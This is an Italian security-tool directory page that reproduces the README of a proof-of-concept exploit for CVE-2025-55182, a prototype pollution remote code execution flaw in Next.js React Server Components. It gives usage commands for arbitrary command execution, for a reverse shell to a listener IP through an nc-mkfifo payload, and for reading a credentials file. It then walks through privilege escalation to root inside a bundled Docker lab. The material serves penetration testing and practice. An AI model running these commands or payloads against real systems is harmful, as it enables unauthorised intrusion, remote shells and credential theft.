Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
POC_react2shell_CVE-2025-55182 — Exploit per CVE-2025-55182 che colpisce i componenti server React di Next.js tramite prototype pollution, consentendo l'esecuzione remota di codice con esecuzione di comandi e payload di reverse shell. Include ambienti lab Docker per la pratica. | Kitploit
Strumenti/GitHubGitHub/nkwenti-severian-ndongtsop/poc_react2shell_cve-2025-55182
Generazione di PayloadExploitSfruttamento di Applicazioni WebCTFPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubnkwenti-severian-ndongtsop/poc_react2shell_cve-2025-55182

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

POC_react2shell_CVE-2025-55182

Exploit per CVE-2025-55182 che colpisce i componenti server React di Next.js tramite prototype pollution, consentendo l'esecuzione remota di codice con esecuzione di comandi e payload di reverse shell. Include ambienti lab Docker per la pratica.

Vedi RepositorySito web
248 mesi faNon ancora revisionato
Condividi

Exploit RCE per Next.js React Server Components

Sfrutta CVE-2025-55182 per esecuzione di codice remoto tramite prototype pollution.

Autore: Severian N.K.

Descrizione

Questo strumento sfrutta una vulnerabilità di prototype pollution nelle applicazioni Next.js che utilizzano React Server Components, portando all'esecuzione di codice remoto (RCE). Supporta sia l'esecuzione diretta di comandi che le reverse shell.

Installazione

Questo progetto utilizza un ambiente virtuale Python per gestire le dipendenze. Prima di tutto, assicurati di avere Python 3 installato.

  1. Configura l'ambiente virtuale:

    root@kitploit:~
    python3 -m venv venv
    
  2. Attiva l'ambiente e installa le dipendenze:

    root@kitploit:~
    source venv/bin/activate
    pip install -r requirements.txt
    

Utilizzo

Assicurati che l'ambiente virtuale sia attivato (source venv/bin/activate) prima di eseguire l'exploit.

Esecuzione di comandi

Per eseguire un singolo comando sul target:

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -c "<COMMAND>"

Esempio:

root@kitploit:~
python3 exploit.py -u http://example.com -c "id"

Reverse Shell

Per ottenere una reverse shell dal target:

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -r -l <LISTENER_IP> -p <LISTENER_PORT>

Esempio:

root@kitploit:~
python3 exploit.py -u http://example.com -r -l 10.10.10.2 -p 9001 -P nc-mkfifo

Ambiente di laboratorio

La directory lab/ contiene due ambienti Docker indipendenti:

  1. App Vulnerabile (lab/vulnerable): In esecuzione sulla porta 3000.
  2. App Corretta (lab/patched): In esecuzione sulla porta 3001.

1. Configura App Vulnerabile

root@kitploit:~
cd lab/vulnerable
chmod +x build.sh run.sh
./build.sh
./run.sh

Accesso: http://localhost:3000

2. Configura App Corretta

root@kitploit:~
cd lab/patched
chmod +x build.sh run.sh
./build.sh
./run.sh

Accesso: http://localhost:3001

3. Test Reverse Shell

Devi specificare il tuo IP del listener (--lhost) e la porta (--lport). Puoi trovare il tuo IP del bridge Docker con ip addr show docker0 (di solito 172.17.0.1).

root@kitploit:~
python exploit.py -u http://localhost:3000 -r -l 172.17.0.1 -p 6000 -P nc-mkfifo

Nota: Usiamo -P nc-mkfifo perché il target sta eseguendo Alpine Linux, che richiede un tipo di payload specifico.

Passo 2: Accesso ai segreti

Il container vulnerabile espone un file segreto.

root@kitploit:~
python3 exploit.py -u http://localhost:3000 -c "cat /secret/credentials.txt"
# Output: manager:SuperSecret2025!

Passo 3: Escalation dei privilegi

Puoi fare escalation da nextjs a root usando le credenziali compromesse.

  1. Cambia utente: su - manager (Password: SuperSecret2025!)
  2. Diventa root: sudo su (Password: SuperSecret2025!)
  3. Cattura la flag:
    root@kitploit:~
    cat /root/flag.txt
    # Output: Congratulations! You have gained full control over the system!
    

Riferimenti

  • Analisi Tecnica (Gist)
  • Laboratorio Pratico (TryHackMe)

Contributi

I contributi sono benvenuti! Se trovi un bug o hai un'idea per un miglioramento, apri una issue o invia una pull request.

Scarica lo strumento